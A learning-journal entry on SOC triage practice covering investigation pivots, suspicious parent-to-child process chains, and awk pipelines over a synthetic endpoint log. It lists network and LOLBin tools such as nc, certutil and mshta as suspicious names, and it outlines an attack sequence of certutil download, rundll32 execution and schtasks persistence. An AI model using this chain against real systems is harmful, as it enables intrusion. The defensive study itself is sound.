📅 Day 29 – SOC Thinking with Linux Pipelines, Pivots, and Process Chains

🎯 Goal

Build a stronger SOC analyst mental model using Linux command-line workflows by learning how to turn raw output into evidence through:

pivots (investigation anchors)
filtering, extraction, and grouping
parent → child process relationships
process-name vocabulary (especially common Windows admin tools and LOLBins)

I also practiced this thinking using a fake endpoint process log lab with awk, sort, and uniq.

🛠️ What I Did

Reinforced the core SOC idea: raw events are material, not the answer

A key idea that became clearer today:

Raw events are narrative fragments.
Counting and grouping transforms them into evidence.

To analyze data effectively, I focused on three questions:

What part matters?
Which field answers the question?
How do I isolate it?
Filter noise and extract relevant fields.
How do I detect patterns?
Count, group, and compare behavior.

This thinking directly connects Linux pipelines with SOC triage workflows.

Learned what a “pivot” means in investigations

A pivot is a value used to move an investigation forward across events.

Common pivots include:

IP address
username
hostname
process name
parent process
command line
domain
file hash
URL path
event result or status code

Two clarifications that helped:

hash → fingerprint of a file’s contents (used to identify known malware or known-good files)
status/result → outcome field such as success, failure, HTTP status codes, etc.

Without pivots, logs are just text.
With pivots, they become investigation paths.

Studied process names and their investigative value

Process names are clues, not conclusions.

Examples studied:

ssh
bash
powershell.exe
cmd.exe
curl
python
rundll32.exe
mshta.exe
wmic.exe
certutil.exe
wget
nc

Many attackers abuse legitimate tools known as:

LOLBins (Living Off the Land Binaries)
Legitimate system utilities used for malicious actions.

Seeing powershell.exe alone means nothing.

Context matters:

parent process
command line
user
host
timestamp
follow-on activity

Built a working vocabulary strategy

Instead of memorizing thousands of process names, I started grouping them by function.

Example categories:

admin tools
scripting engines and runtimes
browsers and Office apps (important parent processes)
LOLBins
security tools

This reduces cognitive load and improves pattern recognition.

Learned why parent → child relationships matter

Parent-child process relationships are one of the fastest ways to spot suspicious behavior.

Example comparison:

powershell.exe

might be normal.

But:

winword.exe → powershell.exe

is far more suspicious.

Examples of suspicious combinations studied:

winword.exe → powershell.exe
excel.exe → cmd.exe
outlook.exe → mshta.exe
chrome.exe → powershell.exe
msedge.exe → mshta.exe
w3wp.exe → cmd.exe
mshta.exe → powershell.exe

Follow-up investigation should check:

command line arguments
user context
host type
process path
execution time
subsequent processes
network activity
baseline frequency

Built a fake endpoint process log lab

To practice analysis, I created a synthetic log file called:

proc_events.log

The file contained pipe-delimited fields:

timestamp
host
user
parent process
child process
command line

Correct parsing required:

awk -F'|'

Important lesson:

Do not assume spaces are delimiters, especially when command lines contain spaces.

Practiced SOC-style analysis pipelines

Using Linux pipelines, I answered investigative questions such as:

Which parent → child combinations appear most often?
Which processes appear rarely?
Which hosts execute suspicious commands?
Which users trigger unusual activity?

Example pipeline pattern:

awk -F'|' '{print $4 " -> " $5}' proc_events.log | sort | uniq -c | sort -nr

Other exercises included:

filtering suspicious process names
grouping by host
grouping by user
identifying URLs inside command lines
finding rare processes

Reconstructed attack narratives

By examining suspicious chains in the synthetic dataset, I could reconstruct realistic attack sequences.

Example attack story:

Office application launches PowerShell
reconnaissance commands run (whoami, ipconfig)
payload download using certutil
DLL execution via rundll32
persistence established with:
- reg.exe
- schtasks.exe

This made the phrase “raw events are narrative fragments” feel very real.

🔐 Key Cybersecurity Connections

Linux pipelines mirror SIEM queries

Linux command-line workflows use the same logic as SIEM queries:

filter → extract → group → rank → interpret

Practicing pipelines builds the same reasoning required for SOC analysis.

Process triage depends on context

Suspicious tools alone are not enough to confirm malicious behavior.

Signal comes from:

parent → child relationship
command-line arguments
user role
host type
baseline frequency
follow-on activity

Pivots drive investigations

Pivots allow analysts to follow activity across logs:

IP
host
user
process
domain
hash
result

Without pivots, analysts only read logs.
With pivots, they investigate behavior.

⚠️ Challenges

Process vocabulary is still developing

Many Windows process names are still unfamiliar, which slows interpretation.

Avoiding name-based conclusions

It is easy to treat scary-looking process names as proof of compromise.

Reminder:

name = clue
context = verdict

Parsing discipline

Incorrect assumptions about log structure can produce incorrect results.

Always inspect:

delimiter
field positions
log format

before parsing.

🧠 What I Learned

Technical

how SOC pivots work
why parent process and command line matter more than names
how common Windows utilities are abused
how to parse pipe-delimited logs with awk
how to construct analysis pipelines

Analytical mindset

raw events are not evidence
grouping reveals patterns
rare events often contain valuable signals
process chains reveal activity narratives

⏭️ Next Steps

Repeat the fake process log lab without notes
Run a challenge round on the same dataset
Expand process-name vocabulary (5 processes per day)
Practice additional log formats:
- authentication logs
- web access logs
- JSON logs (jq)
Begin mapping suspicious process chains to detection rules

💭 Reflection

Today felt like a major SOC foundations day.

The key realization was that Linux command-line skills are not just terminal tricks — they are a method for transforming raw event data into evidence.

Grouping process names into functional categories also made endpoint telemetry easier to interpret.

This type of groundwork directly supports future work in:

detection engineering
SOC triage
incident response
SIEM query building

🧩 Lessons Learned

What worked

grouping processes by function instead of memorizing names
using parent → child relationships for fast context
practicing on synthetic logs
repeating the filter → isolate → group workflow

What broke

unfamiliarity with many Windows process names
risk of treating process names as conclusions

Why it broke

early stage of building SOC vocabulary
endpoint telemetry requires context-rich thinking

Fix / takeaway

build a working vocabulary of common processes
always inspect log format before parsing
treat process names as starting points, not conclusions